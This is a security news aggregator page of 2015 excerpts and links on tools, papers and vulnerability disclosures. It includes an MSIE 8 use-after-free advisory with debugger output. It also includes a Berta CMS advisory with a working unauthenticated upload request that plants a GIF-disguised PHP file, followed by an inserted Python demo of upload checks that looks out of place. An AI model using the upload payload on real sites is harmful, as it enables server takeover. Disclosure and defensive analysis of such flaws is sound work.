  • 03/26/15--08:11: dnscat2 beta release!
  • As I promised during my 2014 Derbycon talk (amongst other places), this is an initial release of my complete re-write/re-design of the dnscat service / protocol. It's now a standalone tool instead of being bundled with nbtool, among other changes. :)

    more here........https://blog.skullsecurity.org/2015/dnscat2-beta-release


    With the recent increase of notifications of cryptolocker malware I was wondering if this dropped malware was always the same version or if the attackers used different versions. I was also curious if the delivery path (e-mail route or otherwise) was different. This raised the question : “How to share malware with a security team?”.

    Some teams have a service where you can upload samples. If they do not have an upload service then you will have to use more traditional methods.

    more here.........http://www.vanimpe.eu/2015/03/26/how-to-share-malware-with-a-security-team/


     Imperva, Inc. (NYSE:IMPV), committed to protecting business-critical data and applications in the cloud and on-premises, today released its latest Hacker Intelligence Initiative (HII) report, "Attacking SSL when using RC4: Breaking SSL with a 13-year old RC4 Weakness." Authored by the company's Application Defense Center (ADC) research team, the report reveals new attack vulnerabilities on the popular Transport Layer Security (TLS/SSL) protocol, which is currently used to protect as many as 30 percent of all SSL transactions, a number that may equate up to billions of TLS connections per day.

    more here.........http://globenewswire.com/news-release/2015/03/26/719155/10126441/en/Imperva-Releases-Latest-Hacker-Intelligence-Initiative-Report-Attacking-SSL-When-Using-RC4.html


    from the keeping-you-safe...-or-keeping-you-vulnerable dept
    Back in October, we highlighted the contradiction of FBI Director James Comey raging against encryption and demanding backdoors, while at the very same time the FBI's own website was suggesting mobile encryption as a way to stay safe. Sometime after that post went online, all of the information on that page about staying safe magically disappeared, though thankfully I screenshotted it at the time

    more here.........https://www.techdirt.com/articles/20150325/17430330432/fbi-quietly-removes-recommendation-to-encrypt-your-phone-as-fbi-director-warns-how-encryption-will-lead-to-tears.shtml


    Abstract
    Binary symbolic execution systems are built from complicated stacks of unreliable software components, process large program sets, and have few shallow decisions. Failure to accurately symbolically model execution produces infeasible paths which are difficult to debug and ultimately inhibits the development of new system features. This dissertation describes the design and implementation of klee-mc, a novel binary symbolic executor that emphasizes self-checking and bit-equivalence properties.

    This thesis first presents cross-checking for detecting causes of infeasible paths. Cross-checking compares outputs from similar components for equivalence and reports mismatches at the point of divergence. This approach systematically finds errors throughout the executor stack from binary translation to expression optimization.

    The second part of this thesis considers the symbolic execution of floating-point code. To support floating-point program instructions, klee-mc emulates floating-point operations with integer-only off-the-shelf soft floating-point libraries. Symbolically executing these libraries generates test cases where soft floating-point implementations and floating-point constraint solvers diverge from hardware results.

    The third part of this thesis discusses a term rewriting system based on program path derived expression reduction rules. These reduction rules improve symbolic execution performance and are machine verifiable. Additionally, these rules generalize through further processing to optimize larger classes of expressions.

    Finally, this thesis describes a flexible mechanism for symbolically dispatching memory accesses. klee-mc forwards target program memory accesses to symbolically executed libraries which retrieve and store memory data. These libraries simplify access policy implementation and ease the management of rich analysis metadata.

    more here..........http://web.stanford.edu/~ajromano/dis.pdf


    One month ago we asked the community for feedback about how they use Metasploit and what they want to see in the Meterpreter payload suite going forward. Over the course of a week we received over 400 responses and over 200 write-in suggestions for new features. We have spent the last month parsing through your responses, identifying dependencies, and actively delivering new features based on your requests. These requests covered 20 different categories

    more here...........https://community.rapid7.com/community/metasploit/blog/2015/03/26/meterpreter-2015-you-spoke-we-listened


    TL;DR: Full disclosure of low risk 0-day in MSIE 8 after 60-day deadline passed without a fix.

    1501H - MSIE 8 - F12 Developer Tools tooltips use-after-free
    ============================================================

    Synopsis
    --------
    When using the Developer Tools of MSIE 8, one might hover the mouse over a
    button in the "Script" tab, at which point a "tooltip" is shown. If one then
    clicks the button, a use-after-free occurs.

    Known affected software and attack vectors
    ------------------------------------------
      + MSIE 8

        An attacker would need to get a target user to open a specially crafted
        webpage. The attacker would then need to trick the target user into
        hovering the mouse over a button until the tooltip is shown and then
        click the button.

    Description
    -----------
    Open a new tab, and then open the Developer Tools by pressing F12, or
    selecting it from the "Tools" menu. Then select the "Scripts" tab in the
    Developer Tools window. Next hover the mouse over one of the buttons with
    the text "Start Debugging", "Run Script" and "Multi Line Mode"/"Single Line
    Mode". When a tooltip is shown, click the button. Here's what happens next
    with paged heap enabled:

    (4dc.814): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0b507fd0 ebx=00000200 ecx=06a48ea0 edx=00000001 esi=06a48ea0 edi=09a21fd0
    eip=7427c0d6 esp=0b40f98c ebp=0b40f98c iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    comctl32!CToolTipsMgr::PopBubble+0xc:
    7427c0d6 8b400c          mov     eax,dword ptr [eax+0Ch]
    ds:0023:0b507fdc=????????

    1:019> kP
    ChildEBP RetAddr
    0b40f98c 7427aa85 comctl32!CToolTipsMgr::PopBubble+0xc
    0b40f9b4 741fc26a comctl32!CToolTipsMgr::HandleRelayedMessage+0x117
    0b40faec 741fbf57 comctl32!CToolTipsMgr::ToolTipsWndProc+0x944
    0b40fb18 7651c4e7 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x32
    0b40fb44 7651c5e7 USER32!InternalCallWinProc+0x23
    0b40fbbc 76515294 USER32!UserCallWinProcCheckWow+0x14b
    0b40fbfc 76515582 USER32!SendMessageWorker+0x4d0
    0b40fc1c 741fc235 USER32!SendMessageW+0x7c
    0b40fc58 741f42aa comctl32!RelayToToolTips+0x49
    0b40fc78 741ff5ee comctl32!TTSubclassProc+0x33
    0b40fcdc 741ff490 comctl32!CallNextSubclassProc+0x3d
    0b40fd3c 7651c4e7 comctl32!MasterSubclassProc+0x54
    0b40fd68 7651c5e7 USER32!InternalCallWinProc+0x23
    0b40fde0 7651cc19 USER32!UserCallWinProcCheckWow+0x14b
    0b40fe40 7651cc70 USER32!DispatchMessageWorker+0x35e
    0b40fe50 6e8e98ef USER32!DispatchMessageW+0xf
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0b40fe84 6e8ee3fb iedvtool+0x598ef
    0b40fe9c 76ceee1c iedvtool+0x5e3fb
    0b40fea8 770c37eb kernel32!BaseThreadInitThunk+0xe
    0b40fee8 770c37be ntdll!__RtlUserThreadStart+0x70
    0b40ff00 00000000 ntdll!_RtlUserThreadStart+0x1b

    1:019> !heap -p -a @eax
        address 0b507fd0 found in
        _DPH_HEAP_ROOT @ 161000
        in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                        b5119f4:          b507000             2000
        6fb3947d verifier!AVrfDebugPageHeapReAllocate+0x0000036d
        7712620b ntdll!RtlDebugReAllocateHeap+0x00000033
        770ee4f0 ntdll!RtlReAllocateHeap+0x00000054
        741f27fe comctl32!CToolTipsMgr::AddTool+0x00000031
        741f28ca comctl32!CToolTipsMgr::ToolTipsWndProc+0x000009a4
        741fbf57 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x00000032
        7651c4e7 USER32!InternalCallWinProc+0x00000023
        7651c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
        76515294 USER32!SendMessageWorker+0x000004d0
        76515582 USER32!SendMessageW+0x0000007c
        69cc8c71 jsdbgui+0x00028c71
        69cc8fa2 jsdbgui+0x00028fa2
        69cc903b jsdbgui+0x0002903b
        69cca6e2 jsdbgui+0x0002a6e2
        69cc5513 jsdbgui+0x00025513
        7651c4e7 USER32!InternalCallWinProc+0x00000023
        76535b7c USER32!UserCallDlgProcCheckWow+0x00000132
        765359f3 USER32!DefDlgProcWorker+0x000000a8
        7653a60e USER32!SendMessageWorker+0x00000340
        76515582 USER32!SendMessageW+0x0000007c
        741fc05d comctl32!CCSendNotify+0x000003e3
        741f364c comctl32!SendNotifyEx+0x00000063
        7427a9f4 comctl32!CToolTipsMgr::PopBubble+0x000000a3
        7427c016 comctl32!CToolTipsMgr::PopBubble+0x0000001c
        7427b50b comctl32!CToolTipsMgr::ShowVirtualBubble+0x00000010
        741fc26a comctl32!CToolTipsMgr::ToolTipsWndProc+0x00000944
        741fbf57 comctl32!CToolTipsMgr::s_ToolTipsWndProc+0x00000032
        7651c4e7 USER32!InternalCallWinProc+0x00000023
        7651c5e7 USER32!UserCallWinProcCheckWow+0x0000014b
        76515294 USER32!SendMessageWorker+0x000004d0
        76515582 USER32!SendMessageW+0x0000007c
        741fc235 comctl32!RelayToToolTips+0x00000049

    Exploit
    -------
    Because the attack vector appears highly unlikely to represent a risk to
    any user, I did not bother to do an in-depth investigation. However, the
    use-after-free occurs in the same process in which the web-page is rendered.
    This suggests that there may be a way for the web-page to reallocate the
    freed memory before its reuse and potentially exploit this issue. However,
    it appears that the free and re-use occur in a very short time span, which
    would make that rather hard if not impossible.

    Notes
    -----
    I allow vendors 60 days to fix an issue, unless they can provide an adequate
    reason for extending this deadline. Failure to meet a deadline without an
    adequate explanation will normally result in public disclosure of
    information regarding the vulnerability to the general public.

    Timeline
    --------
    23 January 2015: vulnerability discovered and reported to MSRC by email.
    23 January 2015: email from MSRC acknowledges receipt of report.
    25 March 2015: email to MSRC to notify them that deadline has been exceeded.
    25 March 2015: Full disclosure of vulnerability details.


    Berta CMS is a web based content management system using PHP and local file storage.

    http://www.berta.me/

    A 3rd party Berta CMS website was being used to redirect links within a phishing email brought to our attention, so we checked the file upload functionality of this software.

    We found that the file upload didn't require authentication.

    Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions.

    It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions.

    http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/

    We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues.

    The author was notified: 2015-03-22
    Author Acknowledge: 2015-03-23
    Patch released: 2015-03-26

    The berta-0.8.10b.zip file from http://www.berta.me/download/ includes a fix that requires authentication to upload files.


    This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails).


    The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers.

    POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
    Host: 192.168.56.101
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.56.101/upload.html
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802
    Content-Length: 1617

    -----------------------------2147563051636691175750543802
    Content-Disposition: form-data; name="Filedata"; filename="c.php"
    Content-Type: text/php

    GIF89/* [binary GIF image data, not reproducible as text] */<?php phpinfo(); ?>/* [binary GIF image data] */ ;

    -----------------------------2147563051636691175750543802
    Content-Disposition: form-data; name="submit"

    Upload Image
    -----------------------------2147563051636691175750543802--




    Simon Waters

    phone  +448454681066
    email  simon.waters@surevine.com
    skype  simon.waters.surevine


    Participate | Collaborate | Innovate

    Surevine Limited
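As an added illustration (not part of the advisory above and not Berta CMS code), the Python below shows why a dimension check of the kind the advisory describes is not an upload filter, and what a hardened check looks like. It builds a constructed 1x1 GIF whose comment extension carries a PHP open tag, reads the dimensions from the header the way an image-size probe such as PHP's getimagesize() does (without decoding the pixels), and compares the lenient policy with one that requires authentication, allowlists image extensions and rejects image bytes that contain a PHP open tag. All function names and the sample bytes are assumptions made for this example.

```python
"""Constructed example: a header-only dimension check accepts image files with
embedded PHP; the hardened policy below rejects them.  Not Berta CMS code."""
import os
import re
import struct

ALLOWED_EXT = {".gif", ".png", ".jpg", ".jpeg"}
# Match "<?php" or "<?=" anywhere in the file body (case-insensitive).
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def build_gif_with_comment(comment: bytes, width: int = 1, height: int = 1) -> bytes:
    """Build a minimal, well-formed GIF89a whose comment extension holds
    `comment`.  This is a constructed sample for the demonstration."""
    header = b"GIF89a" + struct.pack("<HH", width, height)
    header += bytes([0x80, 0x00, 0x00])          # global colour table, 2 entries
    palette = b"\x00\x00\x00\xff\xff\xff"
    comment_ext = b"\x21\xfe"                    # comment extension introducer
    for i in range(0, len(comment), 255):        # 255-byte sub-blocks
        chunk = comment[i:i + 255]
        comment_ext += bytes([len(chunk)]) + chunk
    comment_ext += b"\x00"                       # block terminator
    image = b"\x2c" + struct.pack("<HHHH", 0, 0, width, height) + b"\x00"
    image += b"\x02\x02\x44\x01\x00"             # LZW data for a single pixel
    return header + palette + comment_ext + image + b"\x3b"


def gif_dimensions(data: bytes):
    """Read width/height from the GIF header only, mirroring what a size probe
    like getimagesize() validates: nothing past the logical screen descriptor."""
    if len(data) < 10 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return None
    return struct.unpack("<HH", data[6:10])


def lenient_check(filename: str, data: bytes, min_size=(1, 1)) -> bool:
    """The weak policy: any filename is fine as long as the dimensions parse."""
    dims = gif_dimensions(data)
    return dims is not None and dims >= min_size


def hardened_check(filename: str, data: bytes, authenticated: bool, min_size=(1, 1)):
    """Hardened policy: require a logged-in user, an image extension, parsable
    dimensions, and no PHP open tag anywhere in the bytes.  Returns (ok, reason)."""
    if not authenticated:
        return False, "authentication required"
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} not allowed"
    dims = gif_dimensions(data)
    if dims is None or dims < min_size:
        return False, "not a usable image"
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag in image data"
    return True, "ok"


# Constructed sample: valid GIF header, PHP tag hidden in the comment block.
SAMPLE = build_gif_with_comment(b"*/<?php echo 'constructed marker'; ?>/*")
CLEAN = build_gif_with_comment(b"constructed encoder comment")

if __name__ == "__main__":
    print("dimensions:", gif_dimensions(SAMPLE))
    print("lenient  c.php:", lenient_check("c.php", SAMPLE))
    print("hardened c.php:", hardened_check("c.php", SAMPLE, authenticated=True))
    print("hardened c.gif:", hardened_check("c.gif", SAMPLE, authenticated=True))
    print("hardened clean:", hardened_check("c.gif", CLEAN, authenticated=True))
```

The tag scan catches the pattern the advisory describes, but a byte-pattern blocklist is never the primary control: the robust fixes are the ones the patch applies (authentication) plus storing uploads under a server-generated name in a directory the web server will not execute, or re-encoding the image so that only pixel data survives.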


    I’ve been spending some time recently combing through the old Matasano Blog Catacombs and blowing the dust off years old tomes. It’s been amazing to see how much information from years ago is still relevant today. Case in point: “Enough With the Rainbow Tables: What You Need to Know About Secure Password Schemes” by Thomas Ptacek. In that post, Tom discusses the fascination with Rainbow Tables, and gives some solid guidelines on secure password storage. He goes on to explain why the focus on rainbow tables is flawed and risks missing the true threat. If you haven’t read it, go read it now. I’ll wait.

    Back? Okay, good. Now I’d like to expand on what’s changed since that post, and why its message is still relevant today.

    more here........http://chargen.matasano.com/chargen/2015/3/26/enough-with-the-salts-updates-on-secure-password-schemes.html


    Talk from SyScan 2015 about Apple Security failing to patch vulnerabilities over and over again, because they have apparently no QA at all on security patches.

    more here.....http://www.slideshare.net/i0n1c/syscan-2015-esserios678securityastudyinfail


    The URSNIF malware family is primarily known for being a data-stealing  malware, but it’s also known for acquiring a wide variety of behavior. Known URSNIF variants include backdoors (BKDR_URSNIF.SM), spyware (TSPY_URSNIF.YNJ), and file infectors (PE_URSNIF.A-O).

    more here.........http://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/


    The challenge was delivered as a zip file (InsomniDroid.zip). The first challenge was perhaps to download it (with its 602.5 MiB). The zip file contains a single file: mmcblk0.dd. A file command gives some information

    more here.....http://blog.scrt.ch/2015/03/27/insomnihack-finals-insomnidroid-level-1-writeup/


    Abstract
    The advent of pervasive ubiquitous computing and advancement of wireless communication technologies has resulted in the proliferation of innovative mobile computing devices like tablets and smartphones. In consumer market and business community worldwide, smartphones have become the most reliable portable devices for Internet connectivity and sensitive data storage. As smartphones are becoming the core delivery platform for ubiquitous “connected customer services” paradigm; security threats and concomitant risks are also growing proportionally. Recent reports from security vendors highlight this emerging challenge. Additionally, smartphones pose limitations for security solution architects, such as limited computing power, memory, battery and peripherals etc. This makes the desktop security countermeasures infeasible for smartphone devices. Some known anti-malware commercial products for smartphones – by top ranked security vendors – are signature based and require continuous updating for latest malware detection. Moreover, these products are unable to detect the zero-day and polymorphic malwares for smartphones. Therefore, we argue that the domain of non-signature based anti-malware solutions for smartphones is open for research.

    In this dissertation, a novel security framework is proposed for malware detection on Linux based computers and smartphones using different data mining approaches.

    more here.......http://nexginrc.org/Publications/pub_files/Farrukh_thesis_v2.pdf


    As a Chinese living outside China, I frequently visit Chinese websites, many of which use advertising and visitor tracking provided by Baidu, the largest search engine available in China. As I was browsing one of the most popular Chinese infosec community in China, zone.wooyun.org, at around 12:00pm GMT+8, my browser suddenly started to pop up JS alerts every 5 seconds.

    This is in Chinese so utilize translation software if you do not speak the language. You can read more here http://drops.wooyun.org/papers/5398 and the translated english version here if you are unable to access translation software....http://webcache.googleusercontent.com/search?q=cache:http://insight-labs.org/?p=1682


    click here for additional explanation.....https://thenanfang.com/why-baidu-was-hijacked-to-attack-github/


    During a recent mobile application security analysis for one of our clients, we identified a quite unobvious behaviour in apps that use the AFNetworking library.

    It turned out that because of a logic flaw in the latest version of the library, SSL MiTM attacks are feasible in apps using AFNetworking 2.5.1.

    more here..........http://blog.mindedsecurity.com/2015/03/ssl-mitm-attack-in-afnetworking-251-do.html

  • 03/27/15--03:26: Git from the inside out
  • This essay explains how Git works. It assumes you understand Git well enough to use it to version control your projects.

    The essay focuses on the graph structure that underpins Git and how the properties of this graph dictate Git’s behavior. This focus on fundamentals lets you build your mental model on the truth, rather than on hypotheses constructed from evidence gathered while experimenting with the API. This truer model gives you a better understanding of what Git has done, what it is doing, and what it will do.

    more here.......https://codewords.recurse.com/issues/two/git-from-the-inside-out


    ABSTRACT
    This paper provides a technical overview of the HARES software protection research effort performed by Assured Information Security. HARES is an anti-reverse-engineering technique that uses on-CPU encryption [6] in conjunction with Intel x86 TLB-splitting [11] in order to significantly increase the effort required to obtain the clear-text assembly instructions that comprise the target x86 application. Performance and use-cases of the system are presented, and a number of weaknesses and future works are discussed. Related works are compared and contrasted with HARES in order to highlight its improvements over the current state-of-the-art.


    more here............http://jacobtorrey.com/HARES-WP.pdf


    This quick post will cover the topic of code streaming. For example, take malware. One way for malware to hide and persist on a system is to not contain any malicious code. This is done by getting the malicious payload through an external source, such as a direct request to a web server, a Twitter/social media post, a Pastebin, or any other common mechanism. This code, usually encrypted or obfuscated in some way, is then mapped in to the malicious process and executed. After execution, the memory region is cleaned up and reused or reallocated in order to carry out further malicious functionality.

    more here.........http://www.codereversing.com/blog/?p=194


    Abstract:
    We present a new technique and system, DIODE, for automatically generating inputs that trigger overflows at memory allocation sites. DIODE is designed to identify relevant sanity checks that inputs must satisfy to trigger overflows at target memory allocation sites, then generate inputs that satisfy these sanity checks to successfully trigger the overflow. DIODE works with off-the-shelf, production x86 binaries. Our results show that, for our benchmark set of applications, and for every target memory allocation site exercised by our seed inputs (which the applications process correctly with no overflows), either 1) DIODE is able to generate an input that triggers an overflow at that site or 2) there is no input that would trigger an overflow for the observed target expression at that site.

    more here...........http://dspace.mit.edu/handle/1721.1/96155

  • 03/27/15--06:45: sysmon-queries
  • Queries to parse sysmon event log file with Microsoft logparser

    more here..........https://github.com/JamesHabben/sysmon-queries
